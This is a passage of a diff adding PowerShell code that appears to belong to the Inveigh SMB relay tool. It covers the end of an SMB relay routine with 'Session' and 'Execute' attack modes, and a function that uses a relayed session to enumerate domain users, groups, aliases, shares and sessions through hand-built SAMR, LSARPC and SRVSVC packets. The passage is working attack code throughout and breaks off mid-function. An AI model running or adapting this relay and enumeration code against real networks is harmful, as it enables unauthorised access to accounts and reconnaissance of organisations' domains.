+ $tree_ID = $client_receive[40..43]
+ $stage = 'CreateRequest'
+ }
+
+ 'TreeDisconnect'
+ {
+
+ if($Attack -contains 'Session' -or $Attack -contains 'Execute')
+ {
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
+ $stage = 'Exit'
+ }
+ else
+ {
+ $stage = 'Logoff'
+ }
+
+ }
+
+ }
+
+ }
+
+ 'TreeConnect'
+ {
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+ 'TreeDisconnect'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+
+
+ }
+
+ if($SMB_relay_failed -and $Attack -notcontains 'Session')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay failed on $Target") > $null
+ $stage = 'Exit'
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim()) stage $stage_current") > $null
+ $stage = 'Exit'
+ }
+
+ }
+
+ if($Attack -contains 'Session')
+ {
+ return $SMB_administrator
+ }
+ else
+ {
+ $client.Close()
+ }
+
+ }
+
+ function Invoke-SMBRelayEnum
+ {
+ param ($client,$SMB_user_ID,$session_ID,$process_ID,$Enumerate,$EnumerateGroup)
+
+ $client_receive = New-Object System.Byte[] 81920
+ $SMB_signing = $false
+ $message_ID = $inveigh.session_message_ID_table[$inveigh.session_count]
+ $action = $Enumerate
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $group = $EnumerateGroup
+
+ if($Action -eq 'All')
+ {
+ $action_stage = 'group'
+ }
+ else
+ {
+ $action_stage = $Action
+ }
+
+ $path = "\\" + $Target + "\IPC$"
+ $path_bytes = [System.Text.Encoding]::Unicode.GetBytes($path)
+ $j = 0
+ $stage = 'TreeConnect'
+ $client_stream = $client.GetStream()
+
+ while ($stage -ne 'Exit')
+ {
+
+ try
+ {
+
+ switch ($stage)
+ {
+
+ 'CloseRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2CloseRequest $file_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'Connect2'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRConnect2 $Target
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x06,0x00,0x00,0x00 0x00,0x00 0x39,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'Connect5'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRConnect5 $Target
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x06,0x00,0x00,0x00 0x00,0x00 0x40,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2CreateRequestFile $named_pipe
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'EnumDomainUsers'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMREnumDomainUsers $SAMR_domain_handle
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x08,0x00,0x00,0x00 0x00,0x00 0x0d,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'GetMembersInAlias'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRGetMembersInAlias $SAMR_policy_handle
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x0d,0x00,0x00,0x00 0x00,0x00 0x21,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'Logoff'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2SessionLogoffRequest
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'LookupNames'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRLookupNames $SAMR_domain_handle $Group
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x08,0x00,0x00,0x00 0x00,0x00 0x11,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'LookupRids'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRLookupRids $SAMR_domain_handle $RID_count_bytes $RID_list
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x0b,0x00,0x00,0x00 0x00,0x00 0x12,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'LSAClose'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_LSARPC_data = New-PacketLSAClose $policy_handle
+ $LSARPC_data = ConvertFrom-PacketOrderedDictionary $packet_LSARPC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $LSARPC_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $LSARPC_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $LSARPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $LSARPC_data
+ $stage = 'SendReceive'
+ $step++
+ }
+
+ 'LSALookupSids'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_LSARPC_data = New-PacketLSALookupSids $policy_handle $SID_array
+ $LSARPC_data = ConvertFrom-PacketOrderedDictionary $packet_LSARPC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $LSARPC_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $LSARPC_data.Length 0 0 0x10,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $LSARPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $LSARPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'LSAOpenPolicy'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_LSARPC_data = New-PacketLSAOpenPolicy
+ $LSARPC_data = ConvertFrom-PacketOrderedDictionary $packet_LSARPC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $LSARPC_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $LSARPC_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x06,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $LSARPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $LSARPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'LSAQueryInfoPolicy'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_LSARPC_data = New-PacketLSAQueryInfoPolicy $policy_handle
+ $LSARPC_data = ConvertFrom-PacketOrderedDictionary $packet_LSARPC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $LSARPC_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $LSARPC_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x07,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $LSARPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $LSARPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'NetSessEnum'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SRVSVC_data = New-PacketSRVSVCNetSessEnum $Target
+ $SRVSVC_data = ConvertFrom-PacketOrderedDictionary $packet_SRVSVC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SRVSVC_data.Length 1024
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SRVSVC_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SRVSVC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SRVSVC_data
+ $stage = 'SendReceive'
+ }
+
+ 'NetShareEnumAll'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SRVSVC_data = New-PacketSRVSVCNetShareEnumAll $Target
+ $SRVSVC_data = ConvertFrom-PacketOrderedDictionary $packet_SRVSVC_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SRVSVC_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SRVSVC_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SRVSVC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SRVSVC_data
+ $stage = 'SendReceive'
+ }
+
+ 'OpenAlias'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMROpenAlias $SAMR_domain_handle $SAMR_RID
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x0c,0x00,0x00,0x00 0x00,0x00 0x1b,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'OpenDomain'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMROpenDomain $SAMR_connect_handle $SID_count $LSA_domain_SID
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x07,0x00,0x00,0x00 0x00,0x00 0x07,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'OpenGroup'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMROpenGroup $SAMR_domain_handle $SAMR_RID
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x09,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'ParseLookupRids'
+ {
+ [Byte[]]$response_user_count_bytes = $client_receive[140..143]
+ $response_user_count = [System.BitConverter]::ToInt16($response_user_count_bytes,0)
+ $response_user_start = $response_user_count * 8 + 164
+ $response_user_end = $response_user_start
+ $response_user_length_start = 152
+ $i = 0
+
+ while($i -lt $response_user_count)
+ {
+ $response_user_object = New-Object PSObject
+ [Byte[]]$response_user_length_bytes = $client_receive[$response_user_length_start..($response_user_length_start + 1)]
+ $response_user_length = [System.BitConverter]::ToInt16($response_user_length_bytes,0)
+ $response_user_end = $response_user_start + $response_user_length
+ [Byte[]]$response_actual_count_bytes = $client_receive[($response_user_start - 4)..($response_user_start - 1)]
+ $response_actual_count = [System.BitConverter]::ToInt16($response_actual_count_bytes,0)
+ [Byte[]]$response_user_bytes = $client_receive[$response_user_start..($response_user_end - 1)]
+
+ if($response_actual_count % 2)
+ {
+ $response_user_start += $response_user_length + 14
+ }
+ else
+ {
+ $response_user_start += $response_user_length + 12
+ }
+
+ $response_user = [System.BitConverter]::ToString($response_user_bytes)
+ $response_user = $response_user -replace "-00",""
+ $response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_user = New-Object System.String ($response_user,0,$response_user.Length)
+ $response_user_length_start = $response_user_length_start + 8
+ $i++
+ }
+
+ $stage = 'CloseRequest'
+ }
+
+ 'ParseLookupSids'
+ {
+ [Byte[]]$response_domain_count_bytes = $client_receive[144..147]
+ $response_domain_count = [System.BitConverter]::ToInt16($response_domain_count_bytes,0)
+ $response_domain_start = $response_domain_count * 12 + 172
+ $response_domain_end = $response_domain_start
+ $response_domain_length_start = 160
+ $enumerate_group_user_list = New-Object System.Collections.ArrayList
+ $enumerate_group_group_list = New-Object System.Collections.ArrayList
+ $response_domain_list = @()
+ $i = 0
+
+ while($i -lt $response_domain_count)
+ {
+ [Byte[]]$response_domain_length_bytes = $client_receive[$response_domain_length_start..($response_domain_length_start + 1)]
+ $response_domain_length = [System.BitConverter]::ToInt16($response_domain_length_bytes,0)
+ $response_domain_end = $response_domain_start + $response_domain_length
+ [Byte[]]$response_actual_count_bytes = $client_receive[($response_domain_start - 4)..($response_domain_start - 1)]
+ $response_actual_count = [System.BitConverter]::ToInt16($response_actual_count_bytes,0)
+ [Byte[]]$response_domain_bytes = $client_receive[$response_domain_start..($response_domain_end - 1)]
+
+ if($response_actual_count % 2)
+ {
+ $response_domain_start += $response_domain_length + 42
+ }
+ else
+ {
+ $response_domain_start += $response_domain_length + 40
+ }
+
+ $response_domain = [System.BitConverter]::ToString($response_domain_bytes)
+ $response_domain = $response_domain -replace "-00",""
+ $response_domain = $response_domain.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_domain = New-Object System.String ($response_domain,0,$response_domain.Length)
+ $response_domain_list += $response_domain
+ $response_domain_length_start = $response_domain_length_start + 12
+ $i++
+ }
+
+ [Byte[]]$response_user_count_bytes = $client_receive[($response_domain_start - 4)..($response_domain_start - 1)]
+ $response_user_count = [System.BitConverter]::ToInt16($response_user_count_bytes,0)
+ $response_user_start = $response_user_count * 16 + $response_domain_start + 12
+ $response_user_end = $response_user_start
+ $response_user_length_start = $response_domain_start + 4
+ $i = 0
+
+ while($i -lt $response_user_count)
+ {
+ [Byte[]]$response_user_type_bytes = $client_receive[($response_user_length_start - 4)]
+ [Byte[]]$response_user_length_bytes = $client_receive[$response_user_length_start..($response_user_length_start + 1)]
+ $response_user_length = [System.BitConverter]::ToInt16($response_user_length_bytes,0)
+ $response_SID_index_start = $response_user_length_start + 8
+ [Byte[]]$response_SID_index_bytes = $client_receive[$response_SID_index_start..($response_SID_index_start + 3)]
+ $response_SID_index = [System.BitConverter]::ToInt16($response_SID_index_bytes,0)
+ $response_user_end = $response_user_start + $response_user_length
+ [Byte[]]$response_actual_count_bytes = $client_receive[($response_user_start - 4)..($response_user_start - 1)]
+ $response_actual_count = [System.BitConverter]::ToInt16($response_actual_count_bytes,0)
+ [Byte[]]$response_user_bytes = $client_receive[$response_user_start..($response_user_end - 1)]
+
+ if($response_actual_count % 2)
+ {
+ $response_user_start += $response_user_length + 14
+ }
+ else
+ {
+ $response_user_start += $response_user_length + 12
+ }
+
+ $response_user = [System.BitConverter]::ToString($response_user_bytes)
+ $response_user = $response_user -replace "-00",""
+ $response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_user = New-Object System.String ($response_user,0,$response_user.Length)
+ $response_user_length_start = $response_user_length_start + 16
+ $response_administrator = $response_domain_list[$response_SID_index] + "\" + $response_user
+
+ if($response_user_type_bytes -eq 1)
+ {
